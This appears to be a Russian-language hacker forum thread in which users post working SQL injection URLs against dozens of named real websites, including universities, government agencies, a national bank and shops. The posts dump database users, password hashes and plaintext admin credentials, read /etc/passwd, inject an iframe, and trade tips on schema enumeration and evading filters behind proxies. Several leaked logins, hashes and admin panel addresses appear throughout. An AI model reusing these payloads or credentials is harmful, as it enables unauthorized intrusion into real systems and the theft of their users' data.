ЗЫ У тебя на сайте написано
Взлом баз данных(MySQL,MsSQL,PoastageSQL,Oracle)
/me плачет

http://www.rda.ge/news.php?id=-4+union+select+1,2,CONCAT_WS(char(58),user(),datab ase(),version()),4,5,6,7,8,9,10/*


http://www.nsf.ac.lk/events.php?ID=22%20UNION%20SELECT%201,AES_DECRYPT( AES_ENCRYPT(password,0x71),0x71),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23+from+mysql. user+limit+1,1/*

http://www.fur.su/index.php?id=-1+union+select+1,2,3,4,5/*&type=1&lang=r&pg=1

http://www.volgagis.ru/web/editweb.php?id=-1+union+select+1,2,3,4,convert(version()+using+cp1 251),6,7,8,9,10,11,12,13/*
__
Наконец выходные!!! :) :D

http://www.opera.ge/eng/news.php?id=-328+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,concat(password,0x3a,username),21,2 2,23,24,25,26,27,28,29,30,31,32+from+users/*&menu=news

))думал браузер

http://www.dama.cz/tisk.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,table _name,15,16,17,18+from+INFORMATION_SCHEMA.TABLES+l imit+65,1/*

5-ая версия))) 66 таблиц :) .

http://www.bap10.uscourts.gov/rules.php?part=3&ID=-6+union+select+null,null,null,null,null,123
гов =\ чё то там ничё не получается вывести
update
http://www.tam.ca.gov/view.php?id=-1+union+select+1,2,version(),4

_http://transauto.org.ru/index.php?id=-111+union+select+1,2,3,4,user(),version(),7,8,9,10 ,11,12,13,14,15/*

http://events.internet2.edu/speakers/speakers.php?go=people&id=-3+union+select+1,null,3
=\

http://www.sa.lifebeinit.org/standard.php?id=-34+union+select+1,2,3/*

http://www.solv.ru/snews.php?id=-60+union+select+1,2,3,4/*

http://www.usta.de/standard.php/RefAk/Kultur/termine.html?id=-475+union+select+1,2,3,4,5,6/*

http://www.multaqa.org/etemplate.php?id=-948+union+select+1,2,3,password,email,6,7,8,9,stat us,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+fr om+users/*

http://www.unitedagainsttorture.org/etemplate.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://archaeolog.ru/?id=2&id_nws=-16+union+select+1,2,3,4,5,6,7,8,9/*

http://www.self.by/current_seminar.php?id=-10+union+select+1,2,concat(user_email,char(58),use r_icq,char(58),user_password),4,user_password+from +phpbb_users+limit+1,1/*

http://upack.by/articles.php?id=-148+union+select+1,concat(login,0x3a,password),3,4 ,5,6+from+users/*

http://mp3search.by/artist.php?id=-57258+union+select+1,concat(login,0x3a,password)+f rom+admin/*

http://www.businessconsult.by/pub/?id=-3+union+select+1,2,3,4,5,6,7,8/*

http://www.itc.by/job/index.php?id=-73+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20/*

http://jafi.by/programs.php?id=-6+union+select+1,2,3,4/*

http://www.mvp.gomel.by/news.php?id=-120+union+select+1,2,3,4,5,6,7/*

http://www.v4.by/index.php?n=news_&id=-1570+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.pogoda.by/glossary/?nd=1&id=-5+union+select+1,2+from+mysql.user/*

http://www.smalldog.com/mydog/number.php?id=-1+union+select+convert(version()+using+latin1)/*

http://www.sportexpo.ru/print_base.php?id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3,4/*

http://www.dance.lt/news.php?strid=2871&id=-4244+GROUP+BY+A.id,A.title,pd,pt,A.lead,A.body,A.p ic_alt,A.pic_capt,A.pic_l,SNS.name,SNA.name+union+ select+1,2,user(),version(),5,database(),7,8,9,0,1 ,2,3/*
Доступа к mysql.user нет

http://www.dance.lt/news.php?strid=2871&id=-4244+GROUP+BY+A.id,A.title,pd,pt,A.lead,A.body,A.p ic_alt,A.pic_capt,A.pic_l,SNS.name,SNA.name+union+ select+1,2,user(),version(),5,database(),7,8,9,0,1 ,2,3/*
Доступа к mysql.user нет

http://www.dance.lt/news.php?strid=2871&id=-4244+GROUP+BY+A.id,A.title,pd,pt,A.lead,A.body,A.p ic_alt,A.pic_capt,A.pic_l,SNS.name,SNA.name+union+ select+1,concat(username,char(58),password),3,4,5, 6,7,8,9,0,1,2,3+from+users/*

Так лучше)))

http://www.ceylonam.com/adm/list.php?ID=39+union+select+1,2,3,concat(password, 0x3a,username),5,6,7,8,9,10,11+from+login/*

http://www.ceylonam.com/adm/
пасс в чистом виде


http://www.ceylonam.com/adm/list.php?ID=39+union+select+1,2,3,table_name,5,6,7 ,8,9,10,11+from+INFORMATION_SCHEMA.TABLES/*имена таблиц

http://www.marubeni.lk/html/html/alpha/sltb/lang/en/gallery/preview.php?id=49+union+select+1,2,table_name,4,5, 6+from+INFORMATION_SCHEMA.TABLES+limit+139,1/*

139 таблиц 0_О)))

http://policy.uta.edu/index.php?navid=10366&id=6'
()_o Кто знает как заюзать иньекцию в Front Base вот вам ссылка ^

Может и было...

http://www.nettour.ru/?c=tb_articles&arid=-1+union+select+1,concat(name,char(58),pwd)+from+us er/*

с таблицами беда =\
http://www.gridcc.org/viewparticipant.php?id=-1091+union+select+1,user(),3,4,5,6/*

А вот здесь все очень четко и грамотно, это я называю -идеальная скуль))
http://www.gs-energy.com/news.php?id=-53+union+select+1,user,password,4,version(),6,7,8, 9,10,11,12+from+mysql.user/*

http://www.lygus.lt/ITC/verslas.php?id=-20+union+select+1,concat(user(),0x3a,database(),0x 3a,version()),3,4,5/*

http://games.lala.lt/cats.php?id=-7+union+select+1,version(),3/*

не улыбнуло(((

http://www.terasz.hu/terasz.php?id=galeria&page=sorozat&sorozat_id=996+union+select+1,table_name,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18+from+INFORMATION_S CHEMA.TABLES+limit+2,1/*
Просмотр таблиц лимитом!

http://www.terasz.hu/terasz.php?id=galeria&page=sorozat&sorozat_id=996+union+select+1,concat(user,0x3a,pas sword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+fr om+mysql.user+limit+1,1/*

root:*8E6C3D25857494FD7339B819E6661B6F45FFB320

улыбнуло :D

http://www.artiks.ru/consultant_text.php?id=-4376+union+select+1,2,0x50726576656420616E74696368 61742779,4,5,6,7,null,9,10,11,12,13--

http://money.rin.ru/content/?id=-1+union+select+1,concat(USER(),0x3a,VERSION()),3,4 ,5+from+mysql.user+limit+0,1/*

http://www.famajor.com/index.html?ID=eshop&select=-1+union+select+1,2,3,USER(),5,6,7,8,9,0,1,2,3,4,5, 6,7,8,9,0,1/*&lb=P-MONEY


http://russiantopics.com/money/moneytxt.php?id=-1+union+select+1,concat(username,0x3a,password,0x3 a,email),3,4,5,6+from+users/*

www.itartass.ur.ru
http://www.itartass.ur.ru/money/print.php?id=-9+union+select+1,2,3,version(),5,6,7,8,9
5 версия, 103 столбца, ничё интересного не нашёл 0_о

Может и было...

http://mp3.volpi.ru/view.php?id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3,4,5,6,7,8,9,10,11,12,13/*

Может и было...

http://mp3.volpi.ru/view.php?id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3,4,5,6,7,8,9,10,11,12,13/*

http://mp3.volpi.ru/view.php?id=-1+union+select+1,concat(user,char(58),password),3, 4,5,6,7,8,9,10,11,12,13+from+mysql.user/*

www.itartass.ur.ru

Цитата:
http://www.itartass.ur.ru/money/print.php?id=-9+union+select+1,2,3,version(),5,6,7,8,9


5 версия, 103 столбца, ничё интересного не нашёл 0_о

Ты наверное хотел сказать 103 таблицы))) ;)

_cwhost.ru
http://cwhost.ru/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,concat(pn_uname,0x3a,pn_pas s,0x3a,pn_email),6,7,8,9,10,11,12,13,14,15,16,17+f rom+nuke_users+limit+0,1/*
хостинг какой-то... :D кривой.. при попытке зайти бросает на valuehost, мб подкомпания... дальше не смотрел, т.к. сайт не грузится что-то :(

webstudent.ru
http://webstudent.ru/modules/wfsection/article.php?articleid=1020+and+1020=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
там xoops 2.*
таблица вроде users называется, префикс по умолчанию - xoops. но в данном случае другой :) не стал копаться..

http://www.fiat.com.ro/carinfo_galerie.php?id=-17%20UNION%20SELECT%201,2,concat(user(),0x3a,datab ase()),4,5,6,7,8,9/*
http://www.eliberadio.ro/show.php?id=21+union+select+1,version(),3,4,5,6,7, 8,9,10,11+limit+1,1/*
http://www.romanicriss.org/noutati.php?id=-13%20UNION%20SELECT%201,2,3,4,5,password,7,8,9,10, 11,12+from+users/*
http://www.istyle.ro/categorie.php?id=-97+union+select+1,AES_DECRYPT(AES_ENCRYPT(password ,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13+from+mysql. user/*

pass:4ef35e0e3f1db2c1
user: sqladmin

www.wargames.ru

http://www.wargames.ru/sections.php?op=listarticles&secid=-1+union+select+1,convert(concat(name,char(58),pass ),char),3,4+from+users/*

Вот только ни как юзер, ни как админ зайти почемуто нельзя.


www.splav.kharkov.com

Таблу не подобрал =(
http://www.splav.kharkov.com/choose_mat.php?class_id=-1+union+select+user()/*

http://www.metafysiko.gr/interviews.php?id=-20+union+select+1,version(),3/*
http://www.paokworld.com/outputofarticle.php?ID=-373+union+select+1,2,user(),4,5,6,7,8,9,10/* http://www.rwf.gr/episode1-new.php?id=81%20UNION%20SELECT%201,AES_DECRYPT(AES _ENCRYPT(version(),0x71),0x71),3,4,5,6,7,8+limit+1 ,1/*
http://www.uip.edu/fr/colloques.php?id=-9%20UNION%20SELECT%201,user(),3,4,5,6,7,8/*

www.mediaprovinces.kz

http://www.mediaprovinces.kz/index.php?r=-1+union+select+username,2+from+phpbb_users/*


Еще одна перед сном =)

Вроде стандартные названия колонок не подходят =(

http://www.fitness.ru/news/shownews.phtml?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13+from+users/*

_http://www.hw.net.ua/photoart.php?id='+union+select+1,2,table_name,4,5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schem a.tables+limit+16,1/*

http://www.infonew.ru/show.php?cid=-1+union+select+concat(login,0x3a,password)+from+us ers+limit+0,1/*

=\

www.0577.ru

Лотерея, довольно неплохие призы, много областей, версия 5, но там походу фильтрация при переборе колонок идет. Кто докопается вышлите мне КПК =)


http://www.0577.ru/index.php?region_id=-1+union+select+version()+from+mysql.user/*

http://www.weight-watchers.ee/recipe.php?id=-1+union+select+1,2,3,4,5,6,convert(database(),char ),8,9,10,11,12/*

www.weight-watchers.ee

avtostarter.com

Можно прикупить запчасти =)
На акках довльно крупные скидки 20%+


http://avtostarter.com//obzor.php?k_id=-1+union+select+concat(login,char(58),pass)+from+us ers+limit+3,1/*

www.0577.ru
Лотерея, довольно неплохие призы, много областей, версия 5, но там походу фильтрация при переборе колонок идет. Кто докопается вышлите мне КПК =)
http://www.0577.ru/index.php?region_id=-1+union+select+version()+from+mysql.user/*чето не понятно о какой фильтрации идет речь
http://www.0577.ru/index.php?region_id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+limit+17,100/* ;)

http://sensorweb.mit.edu/principals_a.php?id=-15+union+select+1,concat(user,char(58),password,ch ar(58),host),3,4,5,6,7,8,9,10,11,12,13,14,15+from+ mysql.user
=\

http://www.sibdom.ru/help.php?ids=-1+union+select+1,2,concat(user_name,0x3a,user_pass ),4,5,6,7+from+users/*
http://www.riag.ru/index.php?ids=-1+union+select+1,2,version(),4,5,6,7+from+users/*
http://nskfei.ru/girl.php?ids=-1+union+select+1,user(),3,version(),5,6,7,database ()/*
http://www.zol.ru/review/show.php?ids%5B0%5D=-1+union+select+1,2,3,4,5,user(),7,8,9,10,11+user/*
http://sochinki.ru/girl.php?ids=-1+union+select+1,user(),3,4,5,6,7,8/*
http://sochinki.ru/girl.php?ids=-1+union+select+1,user(),3,4,5,6,7,8/*

2Spyder
но там походу фильтрация при переборе колонок идет
это не перебор колонок?http://www.0577.ru/index.php?region_id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+limit+17,100/*

}{0TT@БЬ)Ч, гыб а ты попробуй теперь чё нить вывести
вот тебе к примеру
таблица - auth_user
колонки - user_name, user_password

upd:
Spyder вроде статью написал а такие простые вещи не знаешь ;)
http://www.0577.ru/index.php?region_id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat(user _name,char(58),user_password),0x71),0x71)+from+anu m_new.auth_user+limit+0,1/*

}{0TT@БЬ)Ч, я делал такой запрос
http://www.0577.ru/index.php?region_id=-1+union+select+concat(user _name,char(58),user_password)+from+auth_user+limit +1,1/*
и теперь посмотри на свой
у тебя anum_new.auth_user, я просто базу правильную не подобрал
=\
Spyder ее не надо подбирать :D
TABLE_SCHEMA+FROM+INFORMATION_SCHEMA.TABLES+WHERE+ TABLE_NAME='тут название таблицы'/* выводит в какой базе находиться таблица.
извиняюсь за оффтоп :rolleyes:

http://www.uca.edu/maptour/index.php?id=-6+union+select+1,2,3,4,version(),6
судя по версии сервак на винде =\

судя по версии сервак на винде =\

http://www.uca.edu/maptour/index.php?id=-6+union+select+1,2,3,4,password,6+from+mysql.user/*

http://www.flirtanica.ru

http://www.flirtanica.ru./articles1.php?id=-1+union+select+1,version(),3,4,5/*


http://www.gelezo.net

http://www.gelezo.net/files.php?id=1'+union+select+1,2,3,4,5,version(),7 ,8,10,11,12,13/*


Кстати, мы всем этим сайтам повышаем популярность, это как каталог бажных сайтов =)

http://www.chita.ru/firms/index.php?page=view&id=-1+union+select+1,2,3,4,5,convert(concat(database() ,char(58),user(),char(58),version()),char),7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

http://www.foodpages.ru/show_firm.php?id_firm=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(databas e(),char(58),user(),char(58),version()),12,13/*

http://vdd.com.ua/Tovaru.php?idr=-1+union+select+concat(database(),char(58),user(),c har(58),version())/*

http://www.michaelpollan.com/article.php?id=80%20UNION%20SELECT%201,user(),3,4, 5,6,7,8,9,10+limit+1,1/*
http://www.spectrum.am/eng/articles.php?id=-60'+union+select+1,2,version()/*
http://www.forumweekly.am/index.php?id=-18+union+select+1,2,user(),4,5,6/*
http://www.xgroup.am/news.php?id=-17+union+select+1,2,3,4,version(),6,7/*
www.footballshop.am
http://www.footballshop.am/shop.php?id=-89+union+select+1,concat(name,0x3a,pwd)+from+user/*
http://www.footballshop.am/shop.php?id=-89+union+select+1,table_name+from+INFORMATION_SCHE MA.TABLES/*
http://design.barsmedia.am/news.php?id=-13+union+select+1,2,table_name,4,5,6,7,8+from+INFO RMATION_SCHEMA.TABLES/*
http://design.barsmedia.am/news.php?id=-13+union+select+1,2,user(),4,5,6,7,8+from+users/*

http://www.switch.ch/de/about/news-archive.html?id=-120+union+select+1,2,3,4,5,6/*
Одна из идеальных скулей...
http://www.wattstopper.com/newsroom/news.html?id=-56+union+select+concat_ws(char(58),user,password), 2,3,4+from+mysql.user/*
С таблицам неприятность =\
http://www.cop-morrien.de/news.html?id=-19+union+select+1,2,3,4,5,version(),database(),8,9 ,10,11,12/*

http://www.net-zone.ru/news.html?id=1+union+select+concat_ws(char(58),use r,password),2,concat(version(),char(58),user(),cha r(58),database()),4+from+mysql.user/*
P.s concat_ws оказался достаточно полезной фичей, имхо)

www.nsu.ru

Новосибирский Государственный Университет

http://www.nsu.ru/dynamic/news/news_view.php?news_mode=single&news_user=user&news_action=view&news_id=-1+union+select+version(),2,3,4,5,6,7,8/*

http://www.pizzamarketplace.com/article.php?id=-1+union+select+version(),2,3,4,5,6,7,8/*

Даже Алёна рекомендует )

http://www.tonnel.ru/index.php?l=cal'+union+select+1,'%3Ciframe%20src=h ttp://antichat.ru%3E%3C/iframe%3E',3,4,5,6,7+from+forum/*

http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-1+union+select+version(),2+/*

Прокся еле живая...кто хочет доперебирайте...

http://www.bilimdon.uz/news/index.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45 bla bla bla/*

Пройдемся по Пакистану :)
http://www.lcwu.edu.pk/fmst/course_content.php?id=-31%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9,10,11 ,12/*
http://forums.brain.net.pk/dealers/singledetails.php?ID=-3+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13, 14/*
http://www.rcci.org.pk/newsdet.php?id=-122+union+select+1,version(),3,4,5,6,7/*
http://pakwatan.com.pk/view_detail.php?id=-30%20UNION%20SELECT%201,database(),3,4,5,6,7,8,9,1 0/*
www.financedeptsindh.gov.pk Финанс.депортамент Пакистана
http://www.financedeptsindh.gov.pk/eafrl/index.php?id=-158+union+select+table_name,2,3+from+INFORMATION_S CHEMA.TABLES+limit+27,1/*
http://www.financedeptsindh.gov.pk/eafrl/index.php?id=-158+union+select+password,2,3+from+sadmin/*

Посморите может что полезного для себя найдете.....
http://www.uvuo.ru/index.html?id=22&did=-2517+union+select+1,2,3,concat_ws(char(58),id,pass word),5,6,7,8,9+from+users/*

www.ceatech.ca
http://www.ceatech.ca/pdetails.php?id=-5834+UNION+SELECT+1,VERSION(),3,USER(),5,6,7,8/*

http://www.mbl.edu/marine_org/flescher/flescher.php?func=detail&id=-52+union+select+concat(user,char(58),password),2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+mys ql.user

edu

http://www.dk.kz/show.php?id=-301876)+union+select+1,concat(version(),0x3a,user( )),database()/*
http://www.dk.kz/show.php?id=-301876)+union+select+1,concat(user,0x3a,password), database()+from+mysql.user/*

http://www.megapolis.kz/show_article.php?art_id=-2763+union+select+concat(user(),0x3a,database(),0x 3a,version())/*

edu

http://sensorweb.mit.edu/principals_a.php?id=-15+union+select+1,concat(user,char(58),password),3 ,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user

http://www.northwestu.edu/hsc/update.php?id=-6+union+select+1,2,version(),4,5,6
пля. Сервер на винде, страница грузится очень медленно =\

edu
http://www.usc.edu/schools/sppd/faculty/detail.php?id=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20

EDU

http://dukemednews.duke.edu/news/article.php?id=-7100+union+select+1,2,3,4,5,concat(user,0x3a,passw ord),7,8+from+mysql.user/*

root:623460e26f081bbc
web:761b2fc844890384
mnogosearch:0547d8b07eba42f3

http://physiology.case.edu/faculty.php?id=-91+union+select+1,2,3,4,5,6,concat(user,0x3a,passw ord),8,9+from+mysql.user/*

root:57959c007a31dffa:TestWeb
Cindy:57959c007a31dffa:TestWeb

может уже было, хз, проверять не стал.

edu
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35/*

Здесь я не нашел столбца с паролями:
www.lib.hsgm.ruhttp://lib.hsgm.ru/?page=cat&cat=-68'%20union%20select%201,user(),3,4,5%20from%20mys ql.user/*А здесь я не смог подобрать названия таблиц:
www.aoelmon.ru
http://www.aoelmon.ru/more.php?pid=-148%20union%20select%201,2,3,4/*www.sexshop-online.ru
http://www.sexshop-online.ru/info.php?ID=-12%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23/*www.flashlands.com
http://www.flashlands.com/flash_view.php?id=-445%20union%20select%201,concat(user(),char(58),ve rsion(),char(58),database(),char(58)),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26/*www.soccershop.ru
http://www.soccershop.ru/shopping/letter_to_friend.php?id=-445%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25/*shop.nourost.ru
http://shop.nourost.ru/index.php?cat=86%20union%20select%201,2,3,4,5,6/*www.uprava.org
http://www.uprava.org/section.php?id=-34%20union%20select%201,concat(version(),char(58), user()),3,4,5,6,7/*А здесь нужно доперебирать:
http://www.extreme-shop.ru/ru/catalogue/index.shtml?CATALOGUE_ID=-1%20union%20select%200,1,2,3,4,5,6/*
http://www.xsp.ru/author/outpub.php?id=445'%20union%20select%201,2,3,4,5/*
http://www.kwadratuur.be/audio.php?id=-445%20union%20select%201/*
http://www.landlords.ru/detail.php?id=-445%20union%20select%201/*
http://www.library.uiuc.edu/sousa/ais/marc.php?id=445%20union%20select%201,2/*
http://www.globaltrading.ru/price.php3?Cat_id=-156%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16/*
http://clubgirls.ru/modules/makeup/?select=-13'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16/*
http://www.autodostavka.ru/?id=725+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14/*
http://gt-store.ru/shop/details.html?id=372%20union%20select%201/*
http://director-online.com/buildArticle.php?id=-1154'%20union%20select%201,2,3,4,5/*
http://www.viptel.ru/?r=17&cat_id=1&firm_id=-13%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16/*
http://pro.sunrise.ru/contents.asp?reg=30'%20union%20select%201,2,3,4/*
P.S Если какая нибудь скуль уже была то сильно не пинайте:).

http://www.porvari.com/kauppa/product_details.php?id=-115%20UNION%20SELECT%201,version(),user(),4,databa se(),6,7,8,9,10,11,12/*

edu
http://www.nuevoparadigma.com/proyectos/indexproject.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35/*

http://www.sabtv.com/shows/shows_inside.php?id=-22+union+select+1,concat(user,0x3a,password)+from+ mysql.user/*

Учебный центр при Институте Информационных Технологий в Москве
http://www.iit-a.ru/text.php?id='+union+select+1,2+from+users/*

ru-hosting.ru
http://ru-hosting.ru/news.php?hnews_id=-1+union+select+1,2,3,4,5+from+users+limit+0,1/*

hostingmotor.com
http://www.hostingmotor.com/basket.php?BID%5B%5D=12328'+union+select+1,2,3,4,5 ,6,7,8/*&dom_about%5B12328%5D=&about%5B12328%5D=&delete=%D3%E4%E0%EB%E8%F2%FC'
правда на экран ничего не выводится =\

webdomain.com.ru
http://webdomain.com.ru/index.php?page=links&catigories=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

edu

http://cat.xula.edu/courses/index.php?mode=view&id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5

какой-то тайваньский сайтег
http://www.so-net.net.tw/qa/index1.html?c_id=2000000262+union+select+1111,conc at(user,0x3a,password)+from+mysql.user/*
http://www.so-net.net.tw/qa/index1.html?c_id=2000000262+union+select+1111,conc at(account,0x3a,password)+from+sell_account/*



http://www.ballys.ee/casino.php?sisu=uudised&id=101+union+select+1,USER(),3,4/*

http://www.detskidom.info/magazine/?act=more&id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3/*

Вывод в title'е:

http://www.illodemiur.ru/?page=guide&id=-1+union+select+1,2,convert(concat(username,char(58 ),user_password),char),4,5+from+phpbb_users+limit+ 1,1/*

http://www.spaceref.com./news/viewsrtype.html?id=359'+union+select+1,2,user(),4, 5,6/*&sdb=companies&name=Moon+Resort+and+Casino

http://www.streetfighters.ru/gallery/index.html?id=5+union+select+1,2,3,4,5,6,7,concat( version(),char(58),user()),9+from+users/*
С колонками сами)) Без прокси НЕ лезть!!

http://ctgweb.byuh.edu/P%20&%20S/p.php?id=-3+union+select+1,2,LOAD_FILE(0x2f6574632f706173737 764)
=\ не льёцо в /tmp, хотя может просто я глючу

www.rs.ru

Русский Стандарт банк

Ни 1,2,3 ни null, не помогают, но через order+by их там 15-16 штук.

http://www.rs.ru/ru/index.php?id70=-1+order+by+16/*

Я снова тут))) :cool:

http://www.ccrl.ca/index.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
http://www.koienterprise.com/buyKoi.php?id=-1+union+select+1,2,3,4,5,version(),7,8,9,10/*
http://www.howdtheyvote.ca/member.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12/*

<noindex>www.nbt.tj

Национальный банк Таджикистана

http://www.nbt.tj/?c=5&id=-1+union+select+1,2,3,4,5,6,7,8,9/*
</noindex>

http://www.sequentialtart.com/article.php?id=-344%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24/*

http://www.phpbuddy.com/article.php?id=-7%20union%20select%201,2,3,4,5,6/*

http://www.karlcore.com/articles/article.php?id=-3%20union%20select%201,2,3,4,5,6/*

http://8e.devbio.com/article.php?id=-162%20union%20select%201,2,concat(username,char(58 ),password),4,5,6,7,8,9,0%20from%20users/*

http://www.fastcasual.com/article.php?id=-6708%20union%20select%201,concat(username,char(58) ,user_email,char(58),user_icq,char(58),user_passwo rd),3,4,5,6,user_id%20from%20phpbb_users%20limit%2 01,2/*

http://www.thesop.org/articles.php?type=-5%20union%20select%201,2,3,4,id,concat(username,ch ar(58),password),7,8,9,0,1,2,3,4%20from%20users/*

__:)__

http://provodka.ru/zakon.php?s=-1+union+select+user()/*


http://www.mosinform.ru/content.php?s=-1+union+select+1,2,3,444,5,6,7,8,9,10+from+news/*


http://www.stove.ru/index.php?lng=0&rs=-1+union+select+concat(table_name,0x3a,version()),2 ,3,4,5,6+from+information_schema.tables/*

http://german.berkeley.edu/newsevents/showevent.php?id=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26
при неправильном запросе вылетает алерт с описанием ошибки + перекидывает на страницу назад. Наркоманы =\

www.stena.ru

Вывод в тайтле.
http://www.stena.ru/catalog.php?page=-1+union+select+1,concat(version(),char(58),user(), char(58),database()),3,4/*

http://php.scripts.psu.edu/jsp17/index.php?action=cv&id=-1+union+select+1
SQLite
разбираться влом. Таблицы не подобрал, не очень то и старался

privet.zp.ua

http://privet.zp.ua/part4.php3?catid=-1+union+select+version()/*

www.eatoutnewyork.com

http://www.eatoutnewyork.com/orgs/show.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16.../*

http://www.69.is/openlink.php?id=-35207+union+select+1,2,concat(password,0x3a,userna me),4,5,6,7,8,9,10,11,12+from+users/*
http://www.69.is/admin/
http://www.beygla.is/fullnews.php?id=704+union+select+1,2,3,4,5,6,7,8+l imit+1,1/*&table=news
не выводится на екран((

Пантера, там пароль и соль в другой таблице. Вотъ
http://os60.com/index.php?page=others&id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(co nverge_pass_hash,char(58),converge_pass_salt),0x78 ),0x78)+from+ibf_members_converge+limit+0,1/*
ЗЫ Сплоенд от РСТ рулит =)

www.chayclub.ru

Клуб любителей чайочка =)
Там и админка рядом.
http://www.chayclub.ru/index.php?page=63&id=-1+union+select+1,2,3,4,5,6,concat(login,char(58),p assword),8+from+users/*


www.crimeahouse.ru

Хотите квартиру в криму ? трафа мало... кто хочет доперебирайте колонки...http://www.crimeahouse.ru/index.php?pageId=12&region=3&acat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50......./*

http://www.hifisalon.ru/index.php?n=-333+union+select+1,user(),concat(0x2d2d2d2d2d2d2d2 d2d2d2d2d2d3e,table_name)+from+information_schema. tables+limit+5,2/*

www.chayclub.ru

Клуб любителей чайочка =)
http://www.chayclub.ru/index.php?page=63&id=-1+union+select+1,2,3,4,5,6,concat(username,char(58 ),user_email,char(58),user_icq,char(58),user_passw ord),8+from+phpbb_users/*

www.icps.kiev.ua

Центр какихто там исследователей "есть ли жизнь на Марсе, нет ли жизни на Марсе"
http://www.icps.kiev.ua/news.html?id=-1+union+select+1,version(),3,4,5/*

http://www.kornid.is/fullgallery.php?id=-10+union+select+1,2,3,4,5,6,concat(password,0x3a,u sername),8+from+users/*&stat=sale
http://www.kornid.is/admin/
pass:dagmar
login:1
http://www.fbjork.is/index.php?id=-483+union+select+1,2,3,version(),database(),6,7/*

http://www.swift.ru/index.php?n=1&f=5&id=-1+union+select+1,2,0x2a2a2a44412048792048415850454 82a2a2a203a2d28,4,5,6,7,8,9,10/*

http://www.cronica.com.mx./nota.php?id_nota=-249802+union+select+1,2,3,4,5,concat(user(),0x3a,d atabase(),0x3a,version())/*

http://www.fbm.ru/main.php?n=2&f=47&mt=0.27036300%201174418216&num=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11/*

http://www.fbm.ru/main.php?n=2&f=47&mt=0.27036300%201174418216&num=-1+union+select+1,load_file('/tmp/ww.php'),3,4,5,6,7,8,9,10,11/*

http://videos.cooltax.net/view.php?id=-163442'+union+select+1,2,3,concat(user,0x3a,passwo rd),5,database(),7,version(),9,0+from+mysql.user/*
root:*CD11B1921012CA99693A28BF0D822D4E5D9E120D

http://www.debtwatch.org/es/inicio/enprofunditat/plantilla_1.php?identif=-1+union+select+1,2,3,4,user(),6,version(),8,9,10,1 1/*
http://www.europa-kherson.com/news/news.php?identif=-1+union+select+1,user(),version(),4/*
